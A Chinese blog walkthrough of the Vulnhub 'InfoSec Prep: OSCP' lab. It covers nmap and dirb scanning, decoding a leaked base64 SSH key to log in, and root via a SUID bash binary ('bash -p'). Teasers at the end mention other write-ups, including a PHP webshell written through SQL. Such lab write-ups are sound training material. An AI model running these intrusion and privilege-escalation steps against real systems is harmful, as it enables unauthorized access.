首页 > 其他分享 >【Vulnhub】OSCP

【Vulnhub】OSCP

时间:2023-08-14 21:44:06浏览次数:36  
标签:bin core18 usr snap OSCP root bash Vulnhub

靶场介绍

靶场下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/


靶场难度:容易

kali:192.168.11.5
靶机:192.168.11.13

信息收集

使用nmap扫描靶机开放的端口及服务

nmap -A -T4 -sS 192.168.11.13

可以看到靶机开启了22和80端口

image

使用dirb扫描一下目录

扫出来一个robots.txt
image

到浏览器中访问一下这个目录

发现有一个目录是/secert.txt目录
image


访问一下这个/secert.txt,根据末尾的"=="可以判断这是一串bash64 image
到解密网站解密,从文首和文末可以判断出这是一串ssh-keygen,这应该是ssh连接的密钥 image
将解密出来的ssh-keygen复制粘贴到一个文件中 image
返回到首页,首页提示flag在/root目录下,登录用户名是oscp image

给rsa_key增加权限

┌──(root㉿kali)-[~]
└─# cd /root/Desktop
                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# ls
rsa_key
                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# chmod 777 rsa_key


使用ssh命令进行连接
┌──(root㉿kali)-[~/Desktop]
└─# ssh -i rsa_key [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'rsa_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "rsa_key": bad permissions
[email protected]: Permission denied (publickey).


发现连接失败,说明777权限不行,重新赋值为600权限
┌──(root㉿kali)-[~/Desktop]
└─# cd /root/Desktop 
                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# ls
rsa_key
                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# chmod 600 rsa_key
                                                                             
┌──(root㉿kali)-[~/Desktop]

再次连接,连接成功
image

进行灵魂三问

id、pwd、whoami

-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)                                                                                                                       
-bash-5.0$ pwd                                                                                                                                                                                                               
/home/oscp                                                                                                                                                                                                                   
-bash-5.0$ whoami                                                                                                                                                                                                            
oscp                        

没发现什么有用信息,就是一个普通的用户权限

提权

需要用到SUID提权,使用命令来朝朝系统上运行的所有SUID可执行的文件

find / -perm -u=s -type f 2>/dev/null

系统列出的文件:
-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/snap/core22/858/usr/bin/chfn                                                                                                                                                                                                
/snap/core22/858/usr/bin/chsh                                                                                                                                                                                                
/snap/core22/858/usr/bin/gpasswd                                                                                                                                                                                             
/snap/core22/858/usr/bin/mount                                                                                                                                                                                               
/snap/core22/858/usr/bin/newgrp                                                                                                                                                                                              
/snap/core22/858/usr/bin/passwd                                                                                                                                                                                              
/snap/core22/858/usr/bin/su                                                                                                                                                                                                  
/snap/core22/858/usr/bin/sudo                                                                                                                                                                                                
/snap/core22/858/usr/bin/umount                                                                                                                                                                                              
/snap/core22/858/usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                                                                  
/snap/core22/858/usr/lib/openssh/ssh-keysign                                                                                                                                                                                 
/snap/snapd/19457/usr/lib/snapd/snap-confine                                                                                                                                                                                 
/snap/core18/2785/bin/mount                                                                                                                                                                                                  
/snap/core18/2785/bin/ping                                                                                                                                                                                                   
/snap/core18/2785/bin/su                                                                                                                                                                                                     
/snap/core18/2785/bin/umount                                                                                                                                                                                                 
/snap/core18/2785/usr/bin/chfn
/snap/core18/2785/usr/bin/chsh
/snap/core18/2785/usr/bin/gpasswd
/snap/core18/2785/usr/bin/newgrp
/snap/core18/2785/usr/bin/passwd
/snap/core18/2785/usr/bin/sudo
/snap/core18/2785/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2785/usr/lib/openssh/ssh-keysign
/snap/core18/1754/bin/mount
/snap/core18/1754/bin/ping
/snap/core18/1754/bin/su
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

现在已知的具有SUID权限的二进制可执行的文件有如下:

nmap
vim
find
bash
more
less
nano
cp
awk

选择bash进行提权,成功提取到root
-bash-5.0$ /usr/bin/bash -p
bash-5.0# whoami

网站首页说flag在/root中,进入到/root目录里,就能看到flag了
bash-5.0# cd /root
bash-5.0# ls
fix-wordpress  flag.txt  snap
bash-5.0# cat flag.txt
d73b04b0e696b0945283defa3eee4538

标签:bin,core18,usr,snap,OSCP,root,bash,Vulnhub
From: https://www.cnblogs.com/imawuya/p/17629853.html

相关文章

  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......
  • Vulnhub: DriftingBlues: 3靶机
    kali:192.168.111.111靶机:192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
  • Vulnhub 靶场 MATRIX-BREAKOUT: 2 MORPHEUS
    前期准备:靶机地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/kali攻击机ip:192.168.11.11靶机ip:192.168.11.12一、信息收集及利用1.使用nmap对目标靶机进行扫描发现开放了22、80、81端口。2.80端口访问80端口:查看页面信息没发现什么重要信息,......
  • Vulnhub: ColddWorld: Immersion靶机
    kali:192.168.111.111靶机:192.168.111.183信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.183查看login的源码发现提示:page和文件/var/carls.txt漏洞利用wfuzz探测account.php页面发现文件包含,参数为pagewfuzz-c-w/opt/zidian/SecLists......
  • Vulnhub: DriftingBlues: 6靶机
    kali:192.168.111.111靶机:192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录:/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,......
  • Vulnhub: blogger:1靶机
    kali:192.168.111.111靶机:192.168.111.176信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.176在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞wpscan--urlhtt......
  • Vulnhub: hacksudo: aliens靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码登录9000端口的phpmyadmin,执行sql语句写入webshellselect'<?phpsystem($......
  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......